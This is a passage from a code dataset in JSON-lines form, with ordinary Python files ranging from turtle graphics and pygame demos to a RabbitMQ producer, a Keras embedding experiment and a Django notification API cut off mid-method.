bias_word_embedding.model[negative_end])\n\n return seed_vector, positive_end, negative_end\n\n\ndef plot_clustering_as_classification(X, y_true, random_state=1, ax=None):\n\n if ax is None:\n _, ax = plt.subplots(figsize=(10, 5))\n\n y_cluster = (KMeans(n_clusters=2, random_state=random_state)\n .fit_predict(X))\n\n embedded_vectors = (TSNE(n_components=2, random_state=random_state)\n .fit_transform(X))\n\n for y_value in np.unique(y_cluster):\n mask = (y_cluster == y_value)\n label = 'Positive' if y_value else 'Negative'\n ax.scatter(embedded_vectors[mask, 0],\n embedded_vectors[mask, 1],\n label=label)\n\n ax.legend()\n\n acc = accuracy_score(y_true, y_cluster)\n\n return max(acc, 1 - acc)\n","sub_path":"responsibly/we/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"522510861","text":"import turtle\r\n\r\nturtle.shape('turtle')\r\nturtle.speed(10)\r\ndef circle(x):\r\n for i in range(40):\r\n\r\n turtle.forward(4)\r\n turtle.left(360/40)\r\n\r\n\r\nfor k in range (1,7):\r\n circle(k)\r\n turtle.setheading(360*k / 6)\r\n\r\nturtle.done()","sub_path":"week03/turtle10.py","file_name":"turtle10.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"337319097","text":"\"\"\"\nSample 7: Listening for events\n\nDemonstrates a couple basic ways of using events.\n\"\"\"\n\nimport sys\nsys.path.append(\"..\") # Add stk library to Python Path, if needed\n\nimport stk.runner\nimport stk.services\nimport stk.events\n\nclass EventsDemo(object):\n \"Simple activity, demonstrating simple ways to listen to events.\"\n def __init__(self, qiapp):\n self.qiapp = qiapp\n self.events = stk.events.EventHelper(qiapp.session)\n self.s = stk.services.ServiceCache(qiapp.session)\n\n def on_touched(self, *args):\n \"Callback for tablet touched.\"\n if args:\n self.events.disconnect(\"ALTabletService.onTouchDown\")\n self.s.ALTextToSpeech.say(\"Yay!\")\n self.stop()\n\n def on_start(self):\n \"Ask to be touched, waits, and exits.\"\n # Two ways of waiting for events\n # 1) block until it's called\n self.s.ALTextToSpeech.say(\"Touch my forehead.\")\n self.events.wait_for(\"FrontTactilTouched\")\n # 1) connect a callback\n if self.s.ALTabletService:\n self.events.connect(\"ALTabletService.onTouchDown\", self.on_touched)\n self.s.ALTextToSpeech.say(\"okay, now touch my tablet.\")\n else:\n self.s.ALTextToSpeech.say(\"oh, I don't have a tablet...\")\n self.stop()\n\n def stop(self):\n \"Standard way of stopping the application.\"\n self.qiapp.stop()\n\n def on_stop(self):\n \"Cleanup\"\n self.events.clear()\n\nif __name__ == \"__main__\":\n stk.runner.run_activity(EventsDemo)\n","sub_path":"python/samples/sample_7_events.py","file_name":"sample_7_events.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"320862552","text":"import sys\nimport numpy as np\nimport ROOT\nfrom ROOT import gROOT, AddressOf\nimport pickle\nOS = sys.platform\nif OS == 'win32':\n sep = '\\\\'\nelif OS == 'linux2':\n sep = '/'\nelse:\n print(\"ERROR: OS {} non compatible\".format(OS))\n sys.exit()\n\nstep = -0.5\nbase_value = 347\nclass thr_importer_cl():\n \n def __init__(self, scan_path):\n self.run_path = scan_path\n self.baseline = {}\n self.baseline_from_calib_matrix=np.zeros((20, 8, 64))\n self.real_baseline_T = 
np.zeros((20, 8, 64))\n        self.real_baseline_E = np.zeros((20, 8, 64))\n        self.thr_matrix_T = np.zeros((20, 8, 64))\n        self.thr_matrix_E = np.zeros((20, 8, 64))\n        self.distance_from_baseline = np.zeros((20,8,64))\n        self.diff_matrix = np.zeros((20,8,3))\n        \n    def import_run_thr(self):\n        \"\"\"\n        Function to import the channel configuration from old RUNS. Needs the pickle containing the data\n        :return:\n        \"\"\"\n        File_name = \"conf_files/CONF_run_375.pkl\"\n\n        with open(File_name, 'rb') as f:\n            old_conf_dict = pickle.load(f)\n\n        for GEMROC_key, dict in old_conf_dict.items():\n            GEMROC_id=GEMROC_key.split(\" \")[1]\n            for TIGER_key, dict2 in dict.items():\n                if TIGER_key.split(\" \")[0] == \"TIGER\":\n                    TIGER_id = int(TIGER_key.split(\" \")[1])\n                    for channel_key, dict3 in dict2.items():\n                        if channel_key.split(\" \")[0] == \"Ch\":\n                            channel_id = int(channel_key.split(\" \")[1])\n                            print (\"{} - {} - {}\".format(GEMROC_id, TIGER_id, channel_id))\n                            try:\n                                print (dict3[\"Vth_T1\"])\n                                print (dict3[\"Vth_T2\"])\n                                self.thr_matrix_T[int(GEMROC_id)][int(TIGER_id)][int(channel_id)]=dict3[\"Vth_T1\"]\n                                self.thr_matrix_E[int(GEMROC_id)][int(TIGER_id)][int(channel_id)]=dict3[\"Vth_T2\"]\n                            except KeyError as e:\n                                print ('Got a KeyError - missing %s. Probably a GEMROC is offline '% str(e))\n                                break\n            # print self.GEMROC_reading_dict[GEMROC_key].c_inst.Channel_cfg_list[TIGER_id][channel_id]\n            print (\"Channel settings for {} loaded\".format(GEMROC_key))\n\n    def save_delta_VTHR_root(self):\n        \"\"\"\n        Save the information about thr and baseline in a root file\n        :return:\n        \"\"\"\n        gROOT.ProcessLine('struct TreeStruct2 {\\\n        int layer_id;\\\n        int gemroc_id;\\\n        int software_feb_id;\\\n        int channel_id;\\\n        int baseline;\\\n        int vth1_digit;\\\n        int vth2_digit;\\\n        float vth1_mV;\\\n        float vth2_mV;\\\n        };')\n        rootFile = ROOT.TFile(\"thresholds.root\", 'recreate')\n        tree = ROOT.TTree('tree', '')\n        mystruct = ROOT.TreeStruct2()\n        for key in ROOT.TreeStruct2.__dict__.keys():\n            if '__' not in key:\n                formstring = '/F'\n                if isinstance(mystruct.__getattribute__(key), int):\n                    formstring = '/I'\n                tree.Branch(key, AddressOf(mystruct, key), key + formstring)\n\n        for GEMROC in range(0, 4):\n            for TIGER in range(0, 8):\n                for ch in range(0, 64):\n                    mystruct.layer_id = int(1)\n                    mystruct.gemroc_id = (int(GEMROC))\n                    mystruct.software_feb_id = int(TIGER)\n                    mystruct.channel_id = int(ch)\n                    mystruct.vth1_digit = int(self.thr_matrix_T[GEMROC][TIGER][ch])\n                    mystruct.vth2_digit = int(self.thr_matrix_E[GEMROC][TIGER][ch])\n                    mystruct.vth1_mV = float(mystruct.vth1_digit*step+base_value)\n                    mystruct.vth2_mV = float(mystruct.vth2_digit*step+base_value)\n                    tree.Fill()\n\n        for GEMROC in range(4, 11):\n            for TIGER in range(0, 8):\n                for ch in range(0, 64):\n                    mystruct.layer_id = int(2)\n                    mystruct.gemroc_id = (int(GEMROC))\n                    mystruct.software_feb_id = int(TIGER)\n                    mystruct.channel_id = int(ch)\n                    mystruct.baseline = int(self.real_baseline_T[GEMROC][TIGER][ch])\n                    mystruct.vth1_digit = int(self.thr_matrix_T[GEMROC][TIGER][ch])\n                    mystruct.vth2_digit = int(self.thr_matrix_E[GEMROC][TIGER][ch])\n                    mystruct.vth1_mV = float(mystruct.vth1_digit*step+base_value)\n                    mystruct.vth2_mV = float(mystruct.vth2_digit*step+base_value)\n                    tree.Fill()\n        rootFile.Write()\n        rootFile.Close()\n\nif __name__ == \"__main__\":\n    thr_importer = thr_importer_cl(\"./scans\")\n    thr_importer.import_run_thr()\n    
thr_importer.save_delta_VTHR_root()\n","sub_path":"export/thr_extration.py","file_name":"thr_extration.py","file_ext":"py","file_size_in_byte":5098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"413750244","text":"class Solution(object):\r\n    def twoSum(self, nums, target):\r\n        if not nums or len(nums) == 1:\r\n            return []\r\n        dictionary = {}\r\n        for index, num in enumerate(nums):\r\n            if target-num not in dictionary:\r\n                dictionary[num] = index\r\n            else:\r\n                return [dictionary[target-num], index]\r\n        return []\r\n","sub_path":"groupon/LC1TwoSum.py","file_name":"LC1TwoSum.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"164767135","text":"from PIL import ImageGrab\nimport numpy as np\nimport cv2\nfrom os import listdir\nfrom os.path import isfile, join\n\ndef load_digits():\n    mypath='/Users/tadhgriordan/Documents/pyQwopper/images/' #\n    onlyfiles = [ f for f in listdir(mypath) if isfile(join(mypath,f)) ]\n    images = np.empty(len(onlyfiles), dtype=object)\n    for n in range(0, len(onlyfiles)):\n        images[n] = cv2.imread( join(mypath,onlyfiles[n]) )\n    return images\n\ndef replace(output):\n    #get index of first value after \"-\" (if present) and last value before dot (if present) - delete everything in between.\n    fst = 1 if \"-\" in output else 0\n    lst = len(output)-1 if not(\".\" in output) else output.index(\".\")-1 \n    if(fst==lst): return output\n    else: return output[0:fst+1] + output[lst:]\n\ndef format_output(total_coords, last_output): \n    total_coords.sort(key=lambda x: x[0]) #sort coordinates by x value\n    output = \"\"\n    for coord in total_coords:\n        if(coord[1]==10): \n            if(\".\" not in output): output += \".\" #if coord is '.' and not in output, append \n        elif(coord[1]==11): \n            if(\"-\" not in output): output += \"-\" #if coord is '-' and not in output, append \n        elif((\".\" not in output) or (\".\" in output and output.index(\".\") == len(output)-1)): output += str(coord[1])\n    \n    output = replace(output) \n    if((last_output == \"3.9\" or last_output == \"4\" or last_output == \"4.1\") and output == \"44\"): output = \"4\" #special case. \n    return output\n    \nimages = load_digits()\nlast_output = \"\"\noutput = \"\"\n\nwhile(True):\n    img = ImageGrab.grab(bbox=(535,239,618,265)) #bbox specifies specific region (bbox= x,y,width,height)\n    img_np = np.array(img)\n\n    frame = cv2.cvtColor(img_np, cv2.COLOR_BGR2GRAY)\n    threshold = 0.884\n    total_coords = []\n    for count, image in enumerate(images):\n        image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n        result = cv2.matchTemplate(frame,image,cv2.TM_CCOEFF_NORMED) \n        match_indices = np.arange(result.size)[(result>threshold).flatten()] \n        coords = np.unravel_index(match_indices,result.shape) #coordinate of match(s)\n\n        if len(coords[1])>0: #only coords[1] matters. its of size 2, 0 has y value and 1 has x i think. 
if match(s) found:\n for np_coord in coords[1]:\n total_coords.append([np_coord, count]) # add coordinate and digit to total coordinates\n \n output = format_output(total_coords, last_output) \n print(\"output: \" + output)\n last_output = output\n \n #cv2.imshow(\"PyQwopper\", frame)\n #cv2.waitKey(1)\ncv2.destroyAllWindows()\n\n#co-ordinates for full box: (317,253,960,650)\n#co-ordinates for distance only: (535,239,608,265)\n\n\n\n","sub_path":"interface/main/distance_read.py","file_name":"distance_read.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"227345151","text":"# -*- coding:utf-8 -*-\n__author__ = 'gaga'\nfrom oslo_config import cfg\nfrom naas.rabbitmq.producer import sendPublish\nfrom naas.api.handler import task_hander\nfrom oslo_log import log as logging\nimport json\n\nLOG = logging.getLogger(__name__)\nCONF = cfg.CONF\nrabbitMQ = [\n cfg.StrOpt('api_scheduler_exchange',\n default='api_scheduler_exchange', help=''),\n cfg.StrOpt('api_scheduler_routing_key',\n default='api_scheduler_routing_key', help=''),\n\n]\nCONF.register_opts(rabbitMQ, 'rabbitMQ')\n\n\nclass BasicMQ(object):\n TASK_JSON_BODY = {}\n MQ_BODY_INIT = {}\n\n def __init__(self, name, object_id, exchange_name=None, routing_key=None, **kwargs):\n self.exchange_name = exchange_name or CONF.rabbitMQ.api_scheduler_exchange\n self.routing_key = routing_key or CONF.rabbitMQ.api_scheduler_routing_key\n self.object_id = object_id\n self.name = name\n self.extra = kwargs\n\n def _create_task(self, task_body):\n task_id = task_hander.add(task_body)\n return task_id\n\n def _update_task(self, task_id, body):\n task_body = {'task': {'task_id': task_id, 'body': body}}\n task_hander.update(task_body)\n\n def publish_mq_to_scheduler(self, msg):\n sendPublish(self.exchange_name, self.routing_key, msg)\n\n def send_message(self):\n try:\n self.TASK_JSON_BODY['task']['object_id'] = self.object_id\n self.TASK_JSON_BODY['task']['name'] = self.name\n task_id = self._create_task(self.TASK_JSON_BODY)\n mq_body = self.MQ_BODY_INIT[self.name]\n mq_body['task_id'] = task_id\n mq_body['object_id'] = self.object_id\n if self.extra:\n mq_body.update(self.extra)\n self._update_task(task_id, json.dumps(mq_body))\n self.publish_mq_to_scheduler(json.dumps(mq_body))\n except Exception as e:\n LOG.error(str(e))\n\n\nclass TunnelMQ(BasicMQ):\n TASK_JSON_BODY = {\n 'task': {\n 'status': 'running',\n 'object_type': 'tunnel'\n }\n }\n MQ_BODY_INIT = {\n 'create_tunnel': {\n 'name': 'create_tunnel',\n 'object_type': 'tunnel'\n },\n 'del_tunnel': {\n 'name': 'del_tunnel',\n 'object_type': 'tunnel'\n },\n 'change_bandwidth': {\n 'name': 'change_bandwidth',\n 'object_type': 'tunnel'\n },\n 'pause_tunnel': {\n 'name': 'pause_tunnel',\n 'object_type': 'tunnel'\n },\n 'resume_tunnel': {\n 'name': 'resume_tunnel',\n 'object_type': 'tunnel'\n }\n }\n\n\nclass SwitchMQ(BasicMQ):\n TASK_JSON_BODY = {\n 'task': {\n 'status': 'running',\n 'object_type': 'switch_port'\n }\n }\n\n MQ_BODY_INIT = {\n 'change_switch_port': {\n 'name': 'change_switch_port',\n 'object_type': 'switch_port'\n }\n\n }\n\n\nif __name__ == '__main__':\n TunnelMQ('create_tunnel', 1).send_message()\n\n\n","sub_path":"naas/api/mq/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"294569423","text":"#!/usr/bin/env python\n\"\"\" pygame.examples.moveit\n\nThis is 
the full and final example from the Pygame Tutorial,\n\"How Do I Make It Move\". It creates 10 objects and animates\nthem on the screen.\n\nNote it's a bit scant on error checking, but it's easy to read. :]\nFortunately, this is python, and we needn't wrestle with a pile of\nerror codes.\n\"\"\"\nimport os\nimport pygame as pg\n\nmain_dir = os.path.split(os.path.abspath(__file__))[0]\n\n# our game object class\nclass GameObject:\n    def __init__(self, image, height, speed):\n        self.speed = speed\n        self.image = image\n        self.pos = image.get_rect().move(0, height)\n\n    def move(self):\n        self.pos = self.pos.move(self.speed, 0)\n        if self.pos.right > 600:\n            self.pos.left = 0\n\n\n# quick function to load an image\ndef load_image(name):\n    path = os.path.join(main_dir, \"data\", name)\n    return pg.image.load(path).convert()\n\n\n# here's the full code\ndef main():\n    pg.init()\n    screen = pg.display.set_mode((640, 480))\n\n    player = load_image(\"player1.gif\")\n    background = load_image(\"liquid.bmp\")\n\n    # scale the background image so that it fills the window and\n    # successfully overwrites the old sprite position.\n    background = pg.transform.scale2x(background)\n    background = pg.transform.scale2x(background)\n\n    screen.blit(background, (0, 0))\n\n    objects = []\n    for x in range(10):\n        o = GameObject(player, x * 40, x)\n        objects.append(o)\n\n    while 1:\n        for event in pg.event.get():\n            if event.type in (pg.QUIT, pg.KEYDOWN):\n                return\n\n        for o in objects:\n            screen.blit(background, o.pos, o.pos)\n        for o in objects:\n            o.move()\n            screen.blit(o.image, o.pos)\n\n        pg.display.update()\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"Ricardo_OS/Python_backend/venv/lib/python3.8/site-packages/pygame/examples/moveit.py","file_name":"moveit.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"447198483","text":"'''\nCategory: Dynamic Programming\nProblem: Integer Triangle (Baekjoon 1932)\nWritten: 2021.06.01\n'''\n\n# Goal: print the maximum total score on a path from the top of the triangle to the bottom\n# Approach: update each cell with the larger of the sums coming from its upper-left and upper-right;\n# cells on the outer edges are handled separately\n# Implementation: the input could be padded into an N*N nested list,\n# but since the column index j depends on i, padding is not actually needed\nN = int(input())\nlst = []\nfor _ in range(N) : \n    lst.append(list(map(int, input().split())))\n    # temp = list(map(int, input().split()))\n    # temp_len = len(temp)\n    # zero = [-1] * (N-temp_len)\n    # temp.extend(zero)\n    # lst.append(temp)\nfor i in range(1,N) : \n    for j in range(i+1) : \n        if j == 0 : \n            lst[i][j] = lst[i][j] + lst[i-1][j]\n        elif j == i : \n            lst[i][j] = lst[i][j] + lst[i-1][j-1]\n        else : \n            lst[i][j] = lst[i][j] + max(lst[i-1][j-1],lst[i-1][j])\nres = -1\nfor i in range(N) : \n    res = max(res,lst[N-1][i])\nprint(res)\n","sub_path":"DP/dp_13_1932.py","file_name":"dp_13_1932.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"480851757","text":"# Time complexity O(m+n)\n# Space complexity O(1)\n\n# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.next = None\n\nclass Solution:\n    def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:\n        \n        lenA, lenB = 0, 0\n        \n        ptr = headA\n        while(ptr):\n            lenA += 1\n            ptr = ptr.next\n        ptr = headB\n        while(ptr):\n            lenB += 1\n            ptr = ptr.next\n        \n        if lenA > lenB:\n            for i in range(lenA - lenB):\n                headA = headA.next\n        else:\n            for i in range(lenB - lenA):\n                headB = headB.next\n        \n        while(headA != headB):\n            headA = headA.next\n            headB = 
headB.next\n \n return headA","sub_path":"intersectNode.py","file_name":"intersectNode.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"569865049","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n###############################################################################\n# Copyright Kitware Inc. and Epidemico Inc.\n#\n# Licensed under the Apache License, Version 2.0 ( the \"License\" );\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n###############################################################################\nimport os\nimport uuid\nfrom gaia import get_abspath, config, GaiaException, types, formats\n\n\nclass GaiaProcess(object):\n \"\"\"\n Abstract class to define a geospatial process\n \"\"\"\n\n # TODO: Enforce required inputs and args\n required_inputs = []\n required_args = []\n optional_args = [\n {\n 'name': 'parent',\n 'title': 'Parent ID',\n 'description': 'Parent ID (UUID format)',\n 'type': str\n }\n\n ]\n default_output = None\n args = None\n\n def __init__(self, inputs=None, output=None, parent=None, **kwargs):\n self.inputs = inputs\n self.output = output\n self.parent = parent\n self.id = str(uuid.uuid4())\n for k, v in kwargs.items():\n setattr(self, k, v)\n self.validate()\n\n def test_arg_type(self, arg, arg_type):\n \"\"\"\n Try to cast a process argument to its required type. 
Raise an\n exception if not successful.\n :param arg: The argument property\n :param arg_type: The required argument type (int, str, etc)\n \"\"\"\n try:\n arg_type(getattr(self, arg))\n except Exception:\n raise GaiaException('Required argument {} must be of type {}'\n .format(arg, arg_type))\n\n def validate(self):\n \"\"\"\n Ensure that all required inputs and arguments are present.\n \"\"\"\n # for input in self.inputs:\n # if input.\n input_types = []\n errors = []\n\n for input in self.inputs:\n type = input.type\n if type == types.PROCESS:\n for t in [i for i in dir(types) if not i.startswith(\"__\")]:\n if any((True for x in input.default_output if x in getattr(\n formats, t, []))):\n type = getattr(types, t)\n break\n input_types.append(type)\n\n for i, req_input in enumerate(self.required_inputs):\n if i >= len(input_types):\n errors.append(\"Not enough inputs for process\")\n elif req_input['type'] != input_types[i]:\n errors.append(\"Input #{} is of incorrect type.\".format(i+1))\n\n if len(input_types) > len(self.required_inputs):\n if (self.required_inputs[-1]['max'] is not None and\n len(input_types) > len(self.required_inputs) +\n self.required_inputs[-1]['max']-1):\n errors.append(\"Incorrect # of inputs; expected {}\".format(\n len(self.required_inputs)))\n else:\n for i in range(len(self.required_inputs)-1, len(input_types)):\n if input_types[i] != self.required_inputs[-1]['type']:\n errors.append(\n \"Input #{} is of incorrect type.\".format(i + 1))\n if errors:\n raise GaiaException('\\n'.join(errors))\n for item in self.required_args:\n arg, arg_type = item['name'], item['type']\n if not hasattr(self, arg) or getattr(self, arg) is None:\n raise GaiaException('Missing required argument {}'.format(arg))\n self.test_arg_type(arg, arg_type)\n if 'options' in item and getattr(self, arg) not in item['options']:\n raise GaiaException('Invalid value for {}'.format(item['name']))\n for item in self.optional_args:\n arg, arg_type = item['name'], item['type']\n if hasattr(self, arg) and getattr(self, arg) is not None:\n self.test_arg_type(arg, arg_type)\n argval = getattr(self, arg)\n if 'options' in item and argval not in item['options']:\n raise GaiaException(\n 'Invalid value for {}'.format(item['name']))\n\n def compute(self):\n \"\"\"\n Abstract method for running process\n \"\"\"\n raise NotImplementedError()\n\n def purge(self):\n \"\"\"\n Delete the process output\n \"\"\"\n self.output.delete()\n\n def get_outpath(self, uri=config['gaia']['output_path']):\n \"\"\"\n Get the output path of the process\n\n :param uri: base output path\n :return: Process output path\n \"\"\"\n ids_path = '{}/{}'.format(\n self.parent, self.id) if self.parent else self.id\n return get_abspath(\n os.path.join(uri, ids_path,\n '{}{}'.format(self.id, self.default_output[0])))\n\n def get_input_classes(self):\n \"\"\"\n Get the unique set of input classes\n\n :return: set of classes\n \"\"\"\n io_classes = set()\n for input in self.inputs:\n input_class = input.__class__.__name__\n if 'Process' not in input_class:\n io_classes.add(input.__class__.__name__)\n else:\n io_classes = io_classes.union(input.process.get_input_classes())\n return io_classes\n","sub_path":"gaia/gaia_process.py","file_name":"gaia_process.py","file_ext":"py","file_size_in_byte":5810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"573919495","text":"import tensorflow as tf\nfrom tensorflow.keras import Sequential\nfrom tensorflow.keras.layers import Embedding, Dense, 
Dropout\nfrom tensorflow.keras.layers import LSTM, Bidirectional, GlobalMaxPool1D\nfrom tensorflow.keras.callbacks import Callback\nfrom tensorflow.keras.initializers import RandomNormal\nimport numpy as np\nimport random\nimport math\n\nfrom datasets import Dataset\n\nrandom.seed(42)\nnp.random.seed(42)\n\nRandomNormal(mean=0.0, stddev=0.05, seed=42)\n\ndef unique_rows(a):\n a = np.ascontiguousarray(a)\n unique_a = np.unique(a.view([('', a.dtype)]*a.shape[1]))\n return unique_a.view(a.dtype).reshape((unique_a.shape[0], a.shape[1]))\n\n\nclass LastLossAccuracy(Callback):\n \n # def on_batch_end(self, epoch, logs=None):\n # print()\n # print(logs.keys())\n \n # def on_train_batch_end(self, epoch, logs=None):\n # print()\n # print(logs.keys())\n \n def on_epoch_end(self, epoch, logs=None):\n self.loss = logs['loss']\n # self.accuracy = logs['accuracy']\n\nds = Dataset(\"pgm-data/TRAIN.arff\",\n \"pgm-data/TEST.arff\",\n \"pgm-data/train.pickle\",\n \"pgm-data/test.pickle\")\n\ninput_array = ds.hotones_train_merged()\ninput_array_original = input_array[:]\n\nnum_words = 2\nlength_vocabulary = len(input_array[0])\nembedding_size = 8\nsamples = 1\ntrain_size = 0.8\ntest_size = 0.2\n\nassert train_size + test_size == 1.0\n\n# artificial_input = np.random.randint(num_words, \n # size=(10000, length_vocabulary))\n# input_array = np.append(input_array, artificial_input, axis=0)\n# input_array = artificial_input\n\ninput_array = unique_rows(input_array)\n\nprint(input_array.shape)\n\n# input_array = np.tile(np.identity(length_vocabulary), [samples,1])\n# input_array = np.random.randint(num_words, size=(samples, length_vocabulary))\n\nnp.random.shuffle(input_array)\n\nlength_input = input_array.shape[0]\nend_train_set = math.floor(length_input * train_size)\ntrain_input_array = input_array[:end_train_set]\ntest_input_array = input_array[end_train_set:]\n\nmodel = Sequential()\nmodel.add(Embedding(length_vocabulary, # 112\n embedding_size,\n input_length=length_vocabulary,\n name='emb'))\nmodel.add(Bidirectional(LSTM(128, return_sequences=True))) #16\nmodel.add(GlobalMaxPool1D())\nmodel.add(Dropout(0.2))\n# model.add(Dense(512, activation='relu'))\n# model.add(Dropout(0.2))\n# model.add(Dense(256, activation='relu'))\n# model.add(Dropout(0.2))\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(length_vocabulary, activation='sigmoid'))\n# model.compile(optimizer=tf.keras.optimizers.RMSprop(lr=0.01),\n# loss='mean_squared_error',\n# metrics=['accuracy'])\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\nlla = LastLossAccuracy()\n\nmodel.fit(train_input_array,\n train_input_array,\n epochs=10, # 5000\n verbose=1,\n workers=2,\n shuffle=False,\n validation_data=(test_input_array, test_input_array),\n callbacks=[lla])\n\n# model.save('pgm-data/deeplearn_model.h5')\n\nloss = model.evaluate(\n input_array_original,\n input_array_original,\n verbose=1,\n workers=2,\n)\n\nprint(\"eval original vector accuracy:\", loss[1])\nprint(\"eval original vector loss:\", loss[0])\n\nemb = model.get_layer(name='emb')\nprint(np.array(emb.get_weights()).shape)\ncoords = emb.get_weights()[0]\nprint(\"coord:\", coords.shape)\n\nfrom matplotlib import pyplot as plt\n\n# for coord, ho in zip(coords, range(len(coords))):\n# plt.text(coord[0], coord[1], ho,\n# ha='center',\n# va='center',\n# size=8)\n\nfrom sklearn.decomposition import KernelPCA\nfrom sklearn.mixture import BayesianGaussianMixture\nfrom colors import random_colors\n\nbgm_model = 
BayesianGaussianMixture(\n n_components=4,\n covariance_type='full',\n max_iter=1000,\n n_init=1,\n init_params='kmeans',\n)\nbgm_model.fit(coords)\ny = bgm_model.predict(coords)\n\nprojection = KernelPCA(n_components=embedding_size, kernel=\"cosine\")\nprojection = projection.fit(coords)\nx_orig = projection.transform(coords)\n\n# projection = KernelPCA(n_components=8, kernel=\"linear\")\n# projection = projection.fit(input_array)\n# # X_proj = projection.transform(input_array)\n# x_orig = projection.transform(input_array_original)\n\n# bgm_model.fit(x_orig[:, 0:8])\n# y = bgm_model.predict(x_orig[:, 0:8])\n\nprint(\"classes:\", np.max(y) + 1)\n# print(lla.loss, length_vocabulary)\n\ncolors = random_colors(np.max(y) + 1, dist=0.15)\nselected_color = colors[:np.max(y) + 1]\ncor = selected_color[y]\n\n_, ax = plt.subplots()\nax.scatter(\n x_orig[:, 0],\n x_orig[:, 1],\n s=10,\n color=cor\n)\n\nplt.axis([-3,3,-3,3])\nplt.xticks = []\nplt.yticks = []\nplt.show()\n\n# print(x_orig)","sub_path":"notes_embeddings.py","file_name":"notes_embeddings.py","file_ext":"py","file_size_in_byte":4829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"203150762","text":"from django import forms\nfrom django.http import Http404\nfrom rest_framework.views import APIView\nfrom rest_framework import permissions, status, pagination, generics\nfrom CustomPermissions import ValidEmail\nfrom userfeatures.models import EpisodeCommentNotification\nfrom userfeatures.serializers import EpisodeCommentNotificationList\nfrom rest_framework.response import Response\n\n\nclass EpisodeCommentNotificationPagination(pagination.PageNumberPagination):\n page_size = 10\n page_size_query_param = 'page_size'\n page_query_param = 'page'\n \n\n def get_paginated_response(self, data):\n return Response({\n 'links': {\n 'next': self.get_next_link(),\n 'previous': self.get_previous_link()\n },\n 'count': self.page.paginator.count,\n 'total_pages': self.page.paginator.num_pages,\n 'results': data\n })\n\n\nclass UnseenNotifications(APIView):\n\n permission_classes = [permissions.IsAuthenticated, ValidEmail]\n \n def get(self, request, format=None):\n response_data = {}\n response_data[\"count\"] = EpisodeCommentNotification.objects.filter(user_notified=request.user, seen=False).count()\n return Response(response_data, status=status.HTTP_200_OK)\n\n def post(self, request, format=None):\n \"\"\"\n Post a specific notification to indicate its been seen\n \"\"\"\n response_data = {}\n sponge=forms.CharField(required=False)\n ec_notification = None\n \n if 'ecNotification_pk' not in request.data:\n response_data[\"detail\"] = \"malformed payload\"\n return Response(response_data, status=status.HTTP_400_BAD_REQUEST)\n \n try:\n # Get notification\n ec_notification = EpisodeCommentNotification.objects.get(pk=sponge.clean(request.data.get(\"ecNotification_pk\")))\n except EpisodeCommentNotification.DoesNotExist as e:\n response_data[\"detail\"] = \"Could not find notification\"\n return Response(response_data, status=status.HTTP_400_BAD_REQUEST)\n except Exception as e:\n #print(e)\n response_data[\"detail\"] = \"Something went kinda wrong\"\n return Response(response_data, status=status.HTTP_400_BAD_REQUEST) \n\n if ec_notification.user_notified != request.user:\n \"\"\"\n XSS attack\n \"\"\"\n response_data[\"detail\"] = \"No means no!\"\n return Response(response_data, status=status.HTTP_400_BAD_REQUEST) \n \n \n ec_notification.seen=True\n\n try:\n ec_notification.save()\n except 
Exception as e:\n            response_data[\"detail\"] = \"Something went really wrong\"\n            return Response(response_data, status=status.HTTP_400_BAD_REQUEST)\n\n        response_data[\"success\"] = \"true\"\n        return Response(response_data, status=status.HTTP_200_OK)\n\n    def delete(self, request, format=None):\n        \"\"\"\n        Delete the notification!\n        \"\"\"\n        response_data = {}\n        sponge = forms.CharField(required=False)\n        if 'ecNotification_pk' not in request.data:\n            response_data[\"detail\"] = \"malformed payload\"\n            return Response(response_data, status=status.HTTP_400_BAD_REQUEST)\n\n        try:\n            # Get notification\n            ec_notification = EpisodeCommentNotification.objects.get(pk=sponge.clean(request.data.get(\"ecNotification_pk\")))\n        except EpisodeCommentNotification.DoesNotExist as e:\n            response_data[\"detail\"] = \"Could not find notification\"\n            return Response(response_data, status=status.HTTP_400_BAD_REQUEST)\n        except Exception as e:\n            #print(e)\n            response_data[\"detail\"] = \"Something went kinda wrong\"\n            return Response(response_data, status=status.HTTP_400_BAD_REQUEST)\n\n        if ec_notification.user_notified != 